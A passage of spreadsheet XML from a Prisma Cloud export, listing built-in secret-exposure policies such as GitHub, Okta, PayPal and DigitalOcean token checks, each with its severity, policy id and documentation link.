      </c>
      <c r="O569" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P569" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q569" t="inlineStr"/>
      <c r="R569" t="inlineStr"/>
      <c r="S569" t="inlineStr"/>
      <c r="T569" t="b">
        <v>0</v>
      </c>
      <c r="U569" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V569" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W569" t="inlineStr">
        <is>
          <t>RubyGems API Key</t>
        </is>
      </c>
      <c r="X569" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-64</t>
        </is>
      </c>
      <c r="Y569" t="inlineStr"/>
      <c r="Z569" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA569" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB569" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC569" t="inlineStr">
        <is>
          <t>CKV_SECRET_64</t>
        </is>
      </c>
      <c r="AD569" t="b">
        <v>1</v>
      </c>
      <c r="AE569" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF569" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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69" t="inlineStr">
        <is>
          <t>2a6b9d00-c551-4f66-865a-9e9950886745</t>
        </is>
      </c>
      <c r="AI569" t="inlineStr"/>
      <c r="AJ569" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK569" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" t="inlineStr"/>
      <c r="B570" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C570" s="2" t="inlineStr"/>
      <c r="D570" t="inlineStr"/>
      <c r="E570" t="inlineStr"/>
      <c r="F570" t="inlineStr"/>
      <c r="G570" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J570" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K570" t="inlineStr">
        <is>
          <t>Hex High Entropy String detected in code</t>
        </is>
      </c>
      <c r="L570" t="inlineStr"/>
      <c r="M570" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N570" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O570" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P570" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q570" t="inlineStr"/>
      <c r="R570" t="inlineStr"/>
      <c r="S570" t="inlineStr"/>
      <c r="T570" t="b">
        <v>0</v>
      </c>
      <c r="U570" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V570" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W570" t="inlineStr">
        <is>
          <t>Hex High Entropy String</t>
        </is>
      </c>
      <c r="X570" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-19</t>
        </is>
      </c>
      <c r="Y570" t="inlineStr"/>
      <c r="Z570" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA570" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB570" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC570" t="inlineStr">
        <is>
          <t>CKV_SECRET_19</t>
        </is>
      </c>
      <c r="AD570" t="b">
        <v>1</v>
      </c>
      <c r="AE570" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF570" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
          <t>a9c6ddac-78da-4928-a3e7-8662bb33f2c5</t>
        </is>
      </c>
      <c r="AI570" t="inlineStr"/>
      <c r="AJ570" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK570" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" t="inlineStr"/>
      <c r="B571" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C571" s="2" t="inlineStr"/>
      <c r="D571" t="inlineStr"/>
      <c r="E571" t="inlineStr"/>
      <c r="F571" t="inlineStr"/>
      <c r="G571" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J571" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K571" t="inlineStr">
        <is>
          <t>Paypal Token Key detected in code</t>
        </is>
      </c>
      <c r="L571" t="inlineStr"/>
      <c r="M571" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N571" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O571" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P571" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q571" t="inlineStr"/>
      <c r="R571" t="inlineStr"/>
      <c r="S571" t="inlineStr"/>
      <c r="T571" t="b">
        <v>0</v>
      </c>
      <c r="U571" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V571" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W571" t="inlineStr">
        <is>
          <t>Paypal Token Key</t>
        </is>
      </c>
      <c r="X571" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-84</t>
        </is>
      </c>
      <c r="Y571" t="inlineStr"/>
      <c r="Z571" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA571" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB571" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC571" t="inlineStr">
        <is>
          <t>CKV_SECRET_84</t>
        </is>
      </c>
      <c r="AD571" t="b">
        <v>1</v>
      </c>
      <c r="AE571" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF571" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>cb26a4ac-8880-40db-b443-6113de89c391</t>
        </is>
      </c>
      <c r="AI571" t="inlineStr"/>
      <c r="AJ571" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK571" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" t="inlineStr"/>
      <c r="B572" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C572" s="2" t="inlineStr"/>
      <c r="D572" t="inlineStr"/>
      <c r="E572" t="inlineStr"/>
      <c r="F572" t="inlineStr"/>
      <c r="G572" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J572" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K572" t="inlineStr">
        <is>
          <t>Codecov API key detected in code</t>
        </is>
      </c>
      <c r="L572" t="inlineStr"/>
      <c r="M572" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N572" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O572" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P572" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q572" t="inlineStr"/>
      <c r="R572" t="inlineStr"/>
      <c r="S572" t="inlineStr"/>
      <c r="T572" t="b">
        <v>0</v>
      </c>
      <c r="U572" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V572" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W572" t="inlineStr">
        <is>
          <t>Codecov API key</t>
        </is>
      </c>
      <c r="X572" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-30</t>
        </is>
      </c>
      <c r="Y572" t="inlineStr"/>
      <c r="Z572" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA572" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB572" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC572" t="inlineStr">
        <is>
          <t>CKV_SECRET_30</t>
        </is>
      </c>
      <c r="AD572" t="b">
        <v>1</v>
      </c>
      <c r="AE572" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF572" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>d047a76c-6d7f-4281-bcb9-9e9c79b896d2</t>
        </is>
      </c>
      <c r="AI572" t="inlineStr"/>
      <c r="AJ572" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK572" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" t="inlineStr"/>
      <c r="B573" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C573" s="2" t="inlineStr"/>
      <c r="D573" t="inlineStr"/>
      <c r="E573" t="inlineStr"/>
      <c r="F573" t="inlineStr"/>
      <c r="G573" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J573" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K573" t="inlineStr">
        <is>
          <t>Okta Keys Client Secret detected in code</t>
        </is>
      </c>
      <c r="L573" t="inlineStr"/>
      <c r="M573" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N573" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O573" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P573" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q573" t="inlineStr"/>
      <c r="R573" t="inlineStr"/>
      <c r="S573" t="inlineStr"/>
      <c r="T573" t="b">
        <v>0</v>
      </c>
      <c r="U573" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V573" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W573" t="inlineStr">
        <is>
          <t>Okta Keys - Client Secret</t>
        </is>
      </c>
      <c r="X573" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-180</t>
        </is>
      </c>
      <c r="Y573" t="inlineStr"/>
      <c r="Z573" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA573" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB573" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC573" t="inlineStr">
        <is>
          <t>CKV_SECRET_180</t>
        </is>
      </c>
      <c r="AD573" t="b">
        <v>1</v>
      </c>
      <c r="AE573" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF573" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>dd7359b5-954e-4b5f-8d29-a2aa6b15093a</t>
        </is>
      </c>
      <c r="AI573" t="inlineStr"/>
      <c r="AJ573" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK573" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" t="inlineStr"/>
      <c r="B574" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C574" s="2" t="inlineStr"/>
      <c r="D574" t="inlineStr"/>
      <c r="E574" t="inlineStr"/>
      <c r="F574" t="inlineStr"/>
      <c r="G574" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J574" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K574" t="inlineStr">
        <is>
          <t>CircleCI Personal Token detected in code</t>
        </is>
      </c>
      <c r="L574" t="inlineStr"/>
      <c r="M574" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N574" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O574" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P574" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q574" t="inlineStr"/>
      <c r="R574" t="inlineStr"/>
      <c r="S574" t="inlineStr"/>
      <c r="T574" t="b">
        <v>0</v>
      </c>
      <c r="U574" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V574" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W574" t="inlineStr">
        <is>
          <t>CircleCI Personal Token</t>
        </is>
      </c>
      <c r="X574" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-29</t>
        </is>
      </c>
      <c r="Y574" t="inlineStr"/>
      <c r="Z574" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA574" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB574" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC574" t="inlineStr">
        <is>
          <t>CKV_SECRET_29</t>
        </is>
      </c>
      <c r="AD574" t="b">
        <v>1</v>
      </c>
      <c r="AE574" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF574" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>10fac584-5171-4acb-8fcf-818c48e93cd5</t>
        </is>
      </c>
      <c r="AI574" t="inlineStr"/>
      <c r="AJ574" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK574" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" t="inlineStr"/>
      <c r="B575" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C575" s="2" t="inlineStr"/>
      <c r="D575" t="inlineStr"/>
      <c r="E575" t="inlineStr"/>
      <c r="F575" t="inlineStr"/>
      <c r="G575" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J575" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K575" t="inlineStr">
        <is>
          <t>DigitalOcean Token detected in code</t>
        </is>
      </c>
      <c r="L575" t="inlineStr"/>
      <c r="M575" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N575" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O575" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P575" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q575" t="inlineStr"/>
      <c r="R575" t="inlineStr"/>
      <c r="S575" t="inlineStr"/>
      <c r="T575" t="b">
        <v>0</v>
      </c>
      <c r="U575" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V575" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W575" t="inlineStr">
        <is>
          <t>DigitalOcean Token</t>
        </is>
      </c>
      <c r="X575" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-34</t>
        </is>
      </c>
      <c r="Y575" t="inlineStr"/>
      <c r="Z575" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA575" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB575" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC575" t="inlineStr">
        <is>
          <t>CKV_SECRET_34</t>
        </is>
      </c>
      <c r="AD575" t="b">
        <v>1</v>
      </c>
      <c r="AE575" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF575" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>0a2d7460-9379-438d-9e0b-ab2976a826e0</t>
        </is>
      </c>
      <c r="AI575" t="inlineStr"/>
      <c r="AJ575" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK575" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" t="inlineStr"/>
      <c r="B576" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C576" s="2" t="inlineStr"/>
      <c r="D576" t="inlineStr"/>
      <c r="E576" t="inlineStr"/>
      <c r="F576" t="inlineStr"/>
      <c r="G576" t="b">
        <v>1</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J576" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K576" t="inlineStr">
        <is>
          <t>Random High Entropy String detected in code</t>
        </is>
      </c>
      <c r="L576" t="inlineStr"/>
      <c r="M576" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N576" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O576" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P576" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q576" t="inlineStr"/>
      <c r="R576" t="inlineStr"/>
      <c r="S576" t="inlineStr"/>
      <c r="T576" t="b">
        <v>0</v>
      </c>
      <c r="U576" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V576" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W576" t="inlineStr">
        <is>
          <t>Random High Entropy String</t>
        </is>
      </c>
      <c r="X576" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-80</t>
        </is>
      </c>
      <c r="Y576" t="inlineStr"/>
      <c r="Z576" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA576" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB576" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC576" t="inlineStr">
        <is>
          <t>CKV_SECRET_80</t>
        </is>
      </c>
      <c r="AD576" t="b">
        <v>1</v>
      </c>
      <c r="AE576" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF576" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>df5baff4-9284-4089-b9f3-7d267c907941</t>
        </is>
      </c>
      <c r="AI576" t="inlineStr"/>
      <c r="AJ576" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK576" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" t="inlineStr"/>
      <c r="B577" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C577" s="2" t="inlineStr"/>
      <c r="D577" t="inlineStr"/>
      <c r="E577" t="inlineStr"/>
      <c r="F577" t="inlineStr"/>
      <c r="G577" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J577" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K577" t="inlineStr">
        <is>
          <t>New Relic Key detected in code</t>
        </is>
      </c>
      <c r="L577" t="inlineStr"/>
      <c r="M577" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N577" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O577" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P577" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q577" t="inlineStr"/>
      <c r="R577" t="inlineStr"/>
      <c r="S577" t="inlineStr"/>
      <c r="T577" t="b">
        <v>0</v>
      </c>
      <c r="U577" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V577" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W577" t="inlineStr">
        <is>
          <t>New Relic Key</t>
        </is>
      </c>
      <c r="X577" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-54</t>
        </is>
      </c>
      <c r="Y577" t="inlineStr"/>
      <c r="Z577" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA577" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB577" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC577" t="inlineStr">
        <is>
          <t>CKV_SECRET_54</t>
        </is>
      </c>
      <c r="AD577" t="b">
        <v>1</v>
      </c>
      <c r="AE577" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF577" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>b2b74119-7057-4412-8b7d-fdf40e3cc916</t>
        </is>
      </c>
      <c r="AI577" t="inlineStr"/>
      <c r="AJ577" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK577" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" t="inlineStr"/>
      <c r="B578" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C578" s="2" t="inlineStr"/>
      <c r="D578" t="inlineStr"/>
      <c r="E578" t="inlineStr"/>
      <c r="F578" t="inlineStr"/>
      <c r="G578" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J578" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K578" t="inlineStr">
        <is>
          <t>Elastic Email Key detected in code</t>
        </is>
      </c>
      <c r="L578" t="inlineStr"/>
      <c r="M578" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N578" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O578" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P578" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q578" t="inlineStr"/>
      <c r="R578" t="inlineStr"/>
      <c r="S578" t="inlineStr"/>
      <c r="T578" t="b">
        <v>0</v>
      </c>
      <c r="U578" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V578" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W578" t="inlineStr">
        <is>
          <t>Elastic Email Key</t>
        </is>
      </c>
      <c r="X578" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-40</t>
        </is>
      </c>
      <c r="Y578" t="inlineStr"/>
      <c r="Z578" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA578" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB578" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC578" t="inlineStr">
        <is>
          <t>CKV_SECRET_40</t>
        </is>
      </c>
      <c r="AD578" t="b">
        <v>1</v>
      </c>
      <c r="AE578" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF578" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>9567784e-cd7a-4fdf-9dc1-dcf90adbe6b1</t>
        </is>
      </c>
      <c r="AI578" t="inlineStr"/>
      <c r="AJ578" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK578" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" t="inlineStr"/>
      <c r="B579" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C579" s="2" t="inlineStr"/>
      <c r="D579" t="inlineStr"/>
      <c r="E579" t="inlineStr"/>
      <c r="F579" t="inlineStr"/>
      <c r="G579" t="b">
        <v>1</v>
      </c>
      <c r="H5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79" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J579" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K579" t="inlineStr">
        <is>
          <t>GitHub Token detected in code</t>
        </is>
      </c>
      <c r="L579" t="inlineStr"/>
      <c r="M579" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N579" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O579" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P579" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q579" t="inlineStr"/>
      <c r="R579" t="inlineStr"/>
      <c r="S579" t="inlineStr"/>
      <c r="T579" t="b">
        <v>0</v>
      </c>
      <c r="U579" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V579" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W579" t="inlineStr">
        <is>
          <t>GitHub Token</t>
        </is>
      </c>
      <c r="X579" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-43</t>
        </is>
      </c>
      <c r="Y579" t="inlineStr"/>
      <c r="Z579" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA579" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB579" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC579" t="inlineStr">
        <is>
          <t>CKV_SECRET_43</t>
        </is>
      </c>
      <c r="AD579" t="b">
        <v>1</v>
      </c>
      <c r="AE579" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF579" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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79" t="inlineStr">
        <is>
          <t>7864b6ac-5de9-4845-81f0-b9d9de32a0ca</t>
        </is>
      </c>
      <c r="AI579" t="inlineStr"/>
      <c r="AJ579" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK579" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" t="inlineStr"/>
      <c r="B580" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C580" s="2" t="inlineStr"/>
      <c r="D580" t="inlineStr"/>
      <c r="E580" t="inlineStr"/>
